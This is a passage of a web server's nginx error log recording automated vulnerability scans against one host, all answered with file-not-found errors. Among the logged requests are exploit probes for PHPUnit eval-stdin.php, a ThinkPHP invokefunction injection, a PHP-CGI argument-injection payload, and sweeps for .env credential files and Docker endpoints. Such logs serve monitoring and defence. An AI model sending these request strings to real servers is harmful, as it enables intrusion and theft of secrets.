localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:14 [error] 415#415: *296502 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:15 [error] 415#415: *296502 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:15 [error] 415#415: *296502 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:15 [error] 415#415: *296502 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:15 [error] 415#415: *296502 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:16 [error] 415#415: *296502 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:16 [error] 415#415: *296502 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:16 [error] 415#415: *296502 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:16 [error] 415#415: *296502 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:17 [error] 415#415: *296502 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:17 [error] 415#415: *296502 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:17 [error] 415#415: *296502 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:17 [error] 415#415: *296502 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:17 [error] 415#415: *296502 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:18 [error] 415#415: *296502 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:18 [error] 415#415: *296502 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:18 [error] 415#415: *296502 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:19 [error] 415#415: *296502 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:19 [error] 415#415: *296502 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:19 [error] 415#415: *296502 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:02:20 [error] 415#415: *296502 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 23.224.68.178, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 01:07:36 [error] 416#416: *296537 open() "/var/www/html/WuEL" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /WuEL HTTP/1.1", host: "91.82.83.208" +2026/01/19 01:07:38 [error] 416#416: *296539 open() "/var/www/html/a" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /a HTTP/1.1", host: "91.82.83.208" +2026/01/19 01:07:39 [error] 416#416: *296540 open() "/var/www/html/download/file.ext" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /download/file.ext HTTP/1.1", host: "91.82.83.208" +2026/01/19 01:07:39 [error] 416#416: *296541 open() "/var/www/html/SiteLoader" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /SiteLoader HTTP/1.1", host: "91.82.83.208" +2026/01/19 01:07:41 [error] 416#416: *296542 open() "/var/www/html/mPlayer" failed (2: No such file or directory), client: 185.91.69.5, server: localhost-nginx-proxy-manager, request: "GET /mPlayer HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:55 [error] 417#417: *296624 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:56 [error] 416#416: *298112 open() "/var/www/html/app/.env.admin" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app/.env.admin HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:56 [error] 416#416: *298113 open() "/var/www/html/config/dev.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /config/dev.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:57 [error] 416#416: *298114 open() "/var/www/html/api/config.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/config.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:57 [error] 416#416: *298115 open() "/var/www/html/config/env.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /config/env.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:58 [error] 416#416: *298116 open() "/var/www/html/config/env.txt" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /config/env.txt HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:58 [error] 416#416: *298117 open() "/var/www/html/configs/db.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /configs/db.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:58 [error] 416#416: *298118 open() "/var/www/html/configura/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /configura/.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:59 [error] 416#416: *298119 open() "/var/www/html/anaconda/..env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /anaconda/..env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:59 [error] 416#416: *298120 open() "/var/www/html/console/.env.1" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /console/.env.1 HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:59 [error] 416#416: *298121 open() "/var/www/html/console/.env.2" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /console/.env.2 HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:59 [error] 417#417: *298122 open() "/var/www/html/.env-vault.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-vault.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:59 [error] 417#417: *298123 open() "/var/www/html/.env-admin.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-admin.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:14:59 [error] 417#417: *298124 open() "/var/www/html/.env-scheduler" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-scheduler HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298125 open() "/var/www/html/.env-agent.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-agent.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298126 open() "/var/www/html/.env-cloud.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-cloud.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298127 open() "/var/www/html/.env-alert.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-alert.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298128 open() "/var/www/html/.env-cloud.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-cloud.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298129 open() "/var/www/html/.env-stack.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-stack.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298130 open() "/var/www/html/.env-webserver" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-webserver HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298131 open() "/var/www/html/.env-stage.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-stage.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:00 [error] 417#417: *298132 open() "/var/www/html/.env-stage.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-stage.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:01 [error] 417#417: *298133 open() "/var/www/html/.env-ssl-chain" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-ssl-chain HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:01 [error] 417#417: *298134 open() "/var/www/html/.env-sanitizer" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-sanitizer HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:01 [error] 417#417: *298135 open() "/var/www/html/.env-trace.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-trace.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:02 [error] 417#417: *298136 open() "/var/www/html/.env-trace.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-trace.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:02 [error] 417#417: *298137 open() "/var/www/html/.env-traceback" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-traceback HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:02 [error] 414#414: *298138 open() "/var/www/html/.env-nginx.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-nginx.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:02 [error] 414#414: *298139 open() "/var/www/html/.env-whois.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-whois.env HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:15:02 [error] 414#414: *298140 open() "/var/www/html/.env-trail.log" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env-trail.log HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:18:22 [error] 414#414: *298143 open() "/var/www/html/owncloud/status.php" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /owncloud/status.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:18:42 [error] 414#414: *298144 open() "/var/www/html/status.php" failed (2: No such file or directory), client: 45.156.128.155, server: localhost-nginx-proxy-manager, request: "GET /status.php HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:19:24 [error] 414#414: *298147 open() "/var/www/html/showLogin.cc" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /showLogin.cc HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:19:39 [error] 414#414: *298148 "/var/www/html/webfig/index.html" is not found (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /webfig/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:19:50 [error] 416#416: *299637 open() "/var/www/html/cgi-bin/main.pl" failed (2: No such file or directory), client: 45.156.128.155, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/main.pl HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:19:52 [error] 416#416: *299638 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:02 [error] 416#416: *299639 open() "/var/www/html/xmldata" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /xmldata?item=all HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:02 [error] 417#417: *299640 open() "/var/www/html/OA_HTML/AppsLocalLogin.jsp" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:13 [error] 417#417: *299641 open() "/var/www/html/console" failed (2: No such file or directory), client: 45.156.128.154, server: localhost-nginx-proxy-manager, request: "GET /console HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:23 [error] 415#415: *301129 open() "/var/www/html/ssi.cgi/Login.htm" failed (2: No such file or directory), client: 45.156.128.154, server: localhost-nginx-proxy-manager, request: "GET /ssi.cgi/Login.htm HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:32 [error] 415#415: *301130 "/var/www/html/aspera/faspex/index.html" is not found (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /aspera/faspex/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:32 [error] 415#415: *301132 "/var/www/html/admin/index.html" is not found (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /admin/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:40 [error] 414#414: *302620 open() "/var/www/html/login/login" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /login/login HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:20:57 [error] 417#417: *307082 open() "/var/www/html/index.jsp" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /index.jsp HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:02 [error] 417#417: *307083 open() "/var/www/html/partymgr/control/main" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /partymgr/control/main HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:07 [error] 417#417: *307084 open() "/var/www/html/Web/Auth" failed (2: No such file or directory), client: 45.156.128.155, server: localhost-nginx-proxy-manager, request: "GET /Web/Auth HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:14 [error] 417#417: *307087 open() "/var/www/html/internal_forms_authentication" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /internal_forms_authentication HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:18 [error] 414#414: *307088 open() "/var/www/html/license.txt" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /license.txt HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:22 [error] 414#414: *307089 open() "/var/www/html/wp-json" failed (2: No such file or directory), client: 45.156.128.154, server: localhost-nginx-proxy-manager, request: "GET /wp-json HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:25 [error] 414#414: *307090 "/var/www/html/solr/index.html" is not found (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /solr/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:30 [error] 414#414: *307091 open() "/var/www/html/login.html" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /login.html HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:35 [error] 414#414: *307092 open() "/var/www/html/jasperserver/login.html" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /jasperserver/login.html HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:41 [error] 414#414: *307093 open() "/var/www/html/jasperserver-pro/login.html" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /jasperserver-pro/login.html HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:47 [error] 414#414: *307094 open() "/var/www/html/jasperserverTest/login.html" failed (2: No such file or directory), client: 45.156.128.152, server: localhost-nginx-proxy-manager, request: "GET /jasperserverTest/login.html HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:51 [error] 414#414: *307095 open() "/var/www/html/Telerik.Web.UI.WebResource.axd" failed (2: No such file or directory), client: 45.156.128.155, server: localhost-nginx-proxy-manager, request: "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:21:56 [error] 416#416: *308583 "/var/www/html/WebInterface/index.html" is not found (2: No such file or directory), client: 45.156.128.154, server: localhost-nginx-proxy-manager, request: "GET /WebInterface/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:07 [error] 417#417: *308584 open() "/var/www/html/sitecore/shell/sitecore.version.xml" failed (2: No such file or directory), client: 45.156.128.155, server: localhost-nginx-proxy-manager, request: "GET /sitecore/shell/sitecore.version.xml HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:13 [error] 417#417: *308586 open() "/var/www/html/progs/homepage" failed (2: No such file or directory), client: 45.156.128.155, server: localhost-nginx-proxy-manager, request: "GET /progs/homepage HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:13 [error] 417#417: *308587 open() "/var/www/html/sugar_version.json" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /sugar_version.json HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:22 [error] 417#417: *308589 open() "/var/www/html/helpdesk/WebObjects/Helpdesk.woa" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:26 [error] 417#417: *308590 open() "/var/www/html/api/session/properties" failed (2: No such file or directory), client: 45.156.128.153, server: localhost-nginx-proxy-manager, request: "GET /api/session/properties HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:30 [error] 416#416: *310078 open() "/var/www/html/identity" failed (2: No such file or directory), client: 45.156.128.154, server: localhost-nginx-proxy-manager, request: "GET /identity HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:22:33 [error] 416#416: *310079 open() "/var/www/html/login.do" failed (2: No such file or directory), client: 45.156.128.154, server: localhost-nginx-proxy-manager, request: "GET /login.do HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:27:46 [error] 416#416: *310088 open() "/var/www/html/version" failed (2: No such file or directory), client: 118.193.38.178, server: localhost-nginx-proxy-manager, request: "GET /version HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 02:27:47 [error] 416#416: *310091 open() "/var/www/html/v1" failed (2: No such file or directory), client: 118.193.38.178, server: localhost-nginx-proxy-manager, request: "GET /v1 HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 02:34:25 [error] 417#417: *310101 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 45.194.70.251, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.83.208" +2026/01/19 02:34:25 [error] 417#417: *310102 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 45.194.70.251, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/19 03:13:04 [error] 417#417: *310158 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:06 [error] 417#417: *310158 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:07 [error] 417#417: *310158 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:08 [error] 417#417: *310158 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:08 [error] 417#417: *310158 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:09 [error] 417#417: *310158 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:10 [error] 417#417: *310158 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:11 [error] 417#417: *310158 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:12 [error] 417#417: *310158 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:12 [error] 417#417: *310158 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:13 [error] 417#417: *310158 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:14 [error] 417#417: *310158 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:15 [error] 417#417: *310158 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:15 [error] 417#417: *310158 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:16 [error] 417#417: *310158 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:17 [error] 417#417: *310158 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:18 [error] 417#417: *310158 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:18 [error] 417#417: *310158 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.199.103.139, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 03:13:19 [error] 417#417: *310158 open() 